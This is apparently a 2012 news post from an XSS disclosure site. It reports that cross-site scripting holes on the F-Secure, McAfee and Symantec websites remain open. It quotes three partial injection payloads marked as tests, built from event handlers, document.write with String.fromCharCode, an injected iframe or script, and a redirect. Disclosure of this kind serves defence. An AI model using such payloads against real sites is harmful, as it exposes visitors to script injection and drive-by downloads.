F-Secure, McAfee and Symantec websites again XSSed

Written by DP

Friday, 13 January 2012

Once again, the websites of the three famous antivirus vendors are vulnerable to cross-site scripting. The vulnerabilities were reported by "Zeitjak" and "dick" back in mid-April 2011 and appear to be working still. They can be triggered on the latest Firefox but not on the latest Internet Explorer and Google Chrome, due to the built-in XSS protection which is enabled by default.

Malicious people can exploit the vulnerabilities to perform drive-by-download attacks against visitors and faithful customers. ("><body+onload="document%2Ewrite(Strin
,111,62,60,47,115,99,114,105,112,116,62))"+  (TEST)

Past XSS vulns and News: ("
onfocus="document.write(String.fromCharCode(60)%2B'iframe src= height=100%25
/)'%2BString.fromCharCode(60)%2B'/script>')" foo="bar  (TEST)

Past XSS vulns and News: (";document.location="";// (TEST)

Past XSS vulns and News:

One thing is sure... when such vulns go public, usually all the three vendors do their best to correct them quickly.

Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.